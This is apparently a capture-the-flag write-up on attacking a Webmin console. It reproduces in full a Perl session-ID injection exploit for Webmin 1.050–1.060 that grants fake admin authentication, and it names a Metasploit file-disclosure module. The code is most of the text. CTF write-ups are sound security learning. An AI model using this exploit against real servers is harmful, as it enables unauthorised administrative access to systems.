This one was fun. The challenge was titled Exploit 2 with the task of finding the flag on the system. A quick nmap scan with service detection showed a Webmin console running on port 10000. I tried searching for a default password for default webmin login but it reads from shadow. I decided to look into webmin vulns next. A quick google search uncovered a remote command execution vuln! Hallelujah! I found the following exploit code.
#!/usr/bin/perl
#
# Exploit for Webmin 1.050 - 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#
print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt \n\n";
$nc="/usr/bin/nc";
if($#ARGV == -1) {
print "Syntax:\n\t$0 hostname\n";
exit(1);
}
$hostname=$ARGV[0];
if ( ! -x $nc ) {
print "netcat not found!\n";
exit(2);
}
open(NC, "|$nc $hostname 10000 >& /dev/null");
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);
print "You should now have a session\_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";
Escalating to admin looks good. Unfortunately, the exploit didn't seem to be working when I plugged the correct cookie values into Firefox. So I kept looking... Metasploit module for file disclosure: auxiliary/admin/webmin/file_disclosure ...